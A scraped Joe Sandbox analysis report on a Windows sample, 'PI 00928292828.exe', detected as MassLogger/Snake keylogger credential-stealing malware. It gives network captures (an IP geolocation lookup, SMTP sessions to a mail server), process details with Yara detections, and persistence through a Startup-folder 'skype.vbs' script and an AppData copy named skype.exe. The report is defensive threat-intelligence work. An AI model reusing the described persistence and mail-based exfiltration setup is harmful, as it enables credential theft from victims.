2025-03-06 06:56:31 UTC	854	IN	HTTP/1.1 200 OK Date: Thu, 06 Mar 2025 06:56:31 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 11 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Thu, 06 Mar 2025 06:56:20 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=00QKf6I%2FaoUNGvqGBfsviyZA3JRghWWERnk2TYl2Qa1Vohnt2P8oE0Bgar8zulHra5vZCE9Nn65glFVd%2F%2FxrvSe1joHvp3oBG8hAvNPvIE7DrXKqKNgCaJT%2FBojU4NvillK9VZf9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91bff425f91b175e-SJC alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=41603&min_rtt=38393&rtt_var=13146&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=82975&cwnd=252&unsent_bytes=0&cid=fb0e4ff868831a46&ts=653&x=0"
2025-03-06 06:56:31 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Mar 6, 2025 07:56:28.054764986 CET	587	49735	217.144.107.148	192.168.2.4	220-cl51.vatanwp.com ESMTP Exim 4.96 #2 Thu, 06 Mar 2025 10:26:27 +0330 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Mar 6, 2025 07:56:28.054959059 CET	49735	587	192.168.2.4	217.144.107.148	EHLO 980108
Mar 6, 2025 07:56:28.322765112 CET	587	49735	217.144.107.148	192.168.2.4	250-cl51.vatanwp.com Hello 980108 [8.46.123.189] 250-SIZE 157286400 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Mar 6, 2025 07:56:28.323147058 CET	49735	587	192.168.2.4	217.144.107.148	STARTTLS
Mar 6, 2025 07:56:28.605588913 CET	587	49735	217.144.107.148	192.168.2.4	220 TLS go ahead
Mar 6, 2025 07:56:37.991766930 CET	587	49739	217.144.107.148	192.168.2.4	220-cl51.vatanwp.com ESMTP Exim 4.96 #2 Thu, 06 Mar 2025 10:26:37 +0330 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Mar 6, 2025 07:56:37.992042065 CET	49739	587	192.168.2.4	217.144.107.148	EHLO 980108
Mar 6, 2025 07:56:38.261135101 CET	587	49739	217.144.107.148	192.168.2.4	250-cl51.vatanwp.com Hello 980108 [8.46.123.189] 250-SIZE 157286400 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Mar 6, 2025 07:56:38.261332989 CET	49739	587	192.168.2.4	217.144.107.148	STARTTLS
Mar 6, 2025 07:56:38.527169943 CET	587	49739	217.144.107.148	192.168.2.4	220 TLS go ahead

Target ID:	0
Start time:	01:56:11
Start date:	06/03/2025
Path:	C:\Users\user\Desktop\PI 00928292828.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PI 00928292828.exe"
Imagebase:	0xf10000
File size:	1'224'704 bytes
MD5 hash:	026760FB65D01ED810DD5195EB848499
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000000.00000002.1701269663.00000000044B3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1701269663.00000000044B3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 00000000.00000002.1701269663.00000000044B3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1701269663.00000000044B3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1701269663.00000000044B3000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000000.00000002.1701269663.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1701269663.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 00000000.00000002.1701269663.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1701269663.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1701269663.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1704081757.0000000005EE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1701269663.0000000004435000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1691908965.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	01:56:12
Start date:	06/03/2025
Path:	C:\Users\user\Desktop\PI 00928292828.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PI 00928292828.exe"
Imagebase:	0x540000
File size:	1'224'704 bytes
MD5 hash:	026760FB65D01ED810DD5195EB848499
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 00000001.00000002.2941514043.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 00000001.00000002.2941514043.0000000000417000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2945608145.0000000002C48000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.2945608145.0000000002C48000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	01:56:25
Start date:	06/03/2025
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\skype.vbs"
Imagebase:	0x7ff622b20000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	01:56:25
Start date:	06/03/2025
Path:	C:\Users\user\AppData\Roaming\skype.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\skype.exe"
Imagebase:	0xc80000
File size:	1'224'704 bytes
MD5 hash:	026760FB65D01ED810DD5195EB848499
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.1859555653.00000000045C3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1859555653.00000000045C3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 00000003.00000002.1859555653.00000000045C3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.1859555653.00000000045C3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.1859555653.00000000045C3000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.1837219390.00000000031F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.1859555653.00000000043A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 42%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	01:56:27
Start date:	06/03/2025
Path:	C:\Users\user\AppData\Roaming\skype.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\skype.exe"
Imagebase:	0x2c0000
File size:	1'224'704 bytes
MD5 hash:	026760FB65D01ED810DD5195EB848499
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2945164614.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.2945164614.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PI 00928292828.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: MassLogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\skype.vbs

C:\Users\user\AppData\Roaming\skype.exe

C:\Users\user\AppData\Roaming\skype.exe:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Windows Analysis Report
PI 00928292828.exe